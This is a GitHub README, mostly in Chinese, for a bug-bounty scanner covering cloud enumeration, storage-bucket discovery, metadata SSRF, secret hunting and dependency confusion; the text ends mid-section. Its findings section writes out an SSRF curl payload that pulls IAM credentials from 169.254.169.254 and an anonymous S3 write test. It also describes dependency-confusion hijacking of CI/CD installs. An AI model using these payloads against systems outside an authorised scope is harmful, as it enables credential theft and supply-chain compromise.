Sharon-Needles/cloud

# cloud.sh — 云与供应链扫描器 **针对云基础设施和供应链攻击面的 8 阶段扫描器：AWS/Azure/GCP 枚举、S3/Blob 存储桶发现、元数据 SSRF、Serverless 函数探测、JS 依赖分析以及依赖混淆。** ## 功能 ### 8 阶段流水线 | 阶段 | 脚本 | 测试内容 | |-------|--------|---------------| | 1 | `cl_cloud_enum.sh` | 通过公司关键字进行 AWS、Azure、GCP 子域名枚举 | | 2 | `cl_bucket_scan.sh` | S3、Azure Blob、GCS 存储桶发现 — 开放读写访问权限 | | 3 | `cl_metadata_ssrf.sh` | 针对 IAM token 窃取的元数据端点 SSRF（`169.254.169.254`、`fd00:ec2::254`） | | 4 | `cl_serverless.sh` | Lambda、Azure Functions、Cloud Run 端点发现 | | 5 | `cl_js_audit.sh` | JavaScript 文件分析，检查云凭证、内部端点和硬编码机密 | | 6 | `cl_dep_confusion.sh` | package.json、requirements.txt 中的依赖混淆/typosquatting (仿冒命名) | | 7 | `cl_sri_check.sh` | CDN 提供的 JS/CSS 缺少 Subresource Integrity (子资源完整性) | | 8 | `cl_cloud_secrets.sh` | HTML、JS、Headers 中的云密钥、IAM 凭证、API token | ### 质量 - **恢复支持** — 阶段级检查点 - **感知 VRT 的输出** — 发现结果分类为 P1–P5 - **关键字驱动** — 阶段 1 和 4 枚举 `{keyword}-prod`、`{keyword}-dev` 等 - **报告生成** — 适用于 Bugcrowd/H1 且附带证据的 Markdown 报告 ## 系统要求 ### 必需项 ``` sudo pacman -S curl jq ``` ### 推荐项 ``` sudo pacman -S python3 gau katana pip install trufflehog # or: sudo pacman -S trufflehog ``` ### 可选 API 密钥 ``` export SHODAN_API_KEY="your_key" # Cloud IP enumeration export GITHUB_TOKEN="your_token" # GitHub search for leaked cloud creds ``` ## 安装说明 ``` git clone https://github.com/Sharon-Needles/cloud cd cloud chmod +x cloud.sh scripts/*.sh # 全局 symlink（可选） sudo ln -s "$(pwd)/cloud.sh" /usr/local/bin/cloud ``` ## 快速开始 ### 交互模式 ``` ./cloud.sh ``` ### 命令行模式 — 完整扫描 ``` ./cloud.sh --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd ``` `--keyword` 标志驱动存储桶和 Serverless 枚举（尝试 `acme-prod`、`acme-dev`、`acme-staging` 等）。 ### 恢复 ``` ./cloud.sh --resume ./hunts/Acme_CLOUD_20260423_120000 ``` ### 单阶段运行 ``` ./scripts/cl_bucket_scan.sh --domains scope.txt --keyword acme -o ./bucket_results ./scripts/cl_metadata_ssrf.sh -d app.example.com -o ./ssrf_results ./scripts/cl_js_audit.sh --domains scope.txt -o ./js_results ``` ## 使用方法 ``` cloud.sh [OPTIONS] Modes: (no args) Interactive --target NAME Target program name --domains FILE File with domains (one per line) --keyword KEYWORD Company keyword for bucket/serverless enumeration --platform PLATFORM bugcrowd | hackerone | other --out DIR Output directory (default: ./hunts) --resume PATH Resume from previous run Options: -t, --threads N Concurrency (default: 30) -h, --help Show help --version Print version ``` ### 示例 **带关键字的完整云扫描：** ``` cloud --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd ``` **仅扫描存储桶：** ``` ./scripts/cl_bucket_scan.sh --domains scope.txt --keyword "acme" -o ./bucket_out ``` **JS 凭证扫描：** ``` ./scripts/cl_js_audit.sh --domains scope.txt -o ./js_out ``` ## 输出结构 ``` Acme_Corp_CLOUD_20260423_120000/ ├── manifest.json ├── phase_status.txt ├── timeline.log │ ├── cl_cloud_enum/ │ ├── aws_domains.txt # *.amazonaws.com, *.s3.amazonaws.com │ ├── azure_domains.txt # *.azurewebsites.net, *.blob.core.windows.net │ ├── gcp_domains.txt # *.appspot.com, *.storage.googleapis.com │ └── cloud_live.txt # Responding cloud endpoints │ ├── cl_bucket_scan/ │ ├── s3_candidates.txt # S3 bucket names tried │ ├── s3_open_read.txt # Publicly readable buckets │ ├── s3_open_write.txt # Publicly writable buckets (P1!) │ ├── azure_blobs.txt # Azure Blob results │ └── gcs_buckets.txt # GCS public buckets │ ├── cl_metadata_ssrf/ │ ├── ssrf_candidates.txt # Endpoints that fetch remote URLs │ ├── metadata_responses.txt # 169.254.169.254 responses │ └── iam_tokens.txt # Extracted IAM credentials (P1!) │ ├── cl_serverless/ │ ├── lambda_endpoints.txt # Lambda function URLs │ ├── azure_functions.txt # Azure Function endpoints │ └── cloud_run.txt # GCP Cloud Run services │ ├── cl_js_audit/ │ ├── js_files.txt # JS files audited │ ├── hardcoded_creds.txt # Potential credentials in JS │ └── internal_endpoints.txt # Internal API URLs from JS │ ├── cl_dep_confusion/ │ ├── package_files.txt # package.json, requirements.txt found │ ├── internal_packages.txt # Internal package names identified │ └── confusion_candidates.txt # Packages vulnerable to dep confusion │ ├── cl_sri_check/ │ └── missing_sri.txt # Third-party scripts without SRI │ ├── cl_cloud_secrets/ │ ├── secret_candidates.txt # All potential secrets found │ └── validated_secrets.txt # Confirmed active credentials │ ├── findings.txt ├── [SUBMIT:P1].txt # Open-write buckets, leaked IAM tokens ├── [SUBMIT:P2].txt # Open-read buckets with sensitive data ├── [SUBMIT:P3].txt # Unauthenticated serverless endpoints ├── [REVIEW:P4].txt # Manual review needed ├── [DO_NOT_SUBMIT:P5].txt # SRI missing (without CDN compromise chain) └── report.md ``` ## 高价值发现模式 ### 具有开放写入权限的 S3 存储桶 (P1) ``` aws s3 ls s3://acme-backup/ --no-sign-request aws s3 cp test.txt s3://acme-backup/ --no-sign-request ``` 如果写入成功：P1 严重 — 攻击者可以后门静态资产或托管钓鱼内容。 ### 元数据 SSRF → IAM Token (P1) Webhook 或 URL 获取参数 → 重定向到 `http://169.254.169.254/latest/meta-data/iam/security-credentials/`： ``` curl "https://app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" ``` ### 具有敏感文件的开放读取存储桶 (P2) 存储桶可读但不可写。如果包含：备份、配置文件、凭证、PII（个人身份信息） → P2。 如果仅包含公共资产 → P5（不应提交）。 ### 依赖混淆 (P2–P3) 发现内部包名（例如，`acme-internal-lib`）在 npm/PyPI 上不存在。 在公共 registry 上注册该包名 → 所有 CI/CD 系统将安装你的版本。 ### 缺少 SRI (P5 — 切勿单独提交) `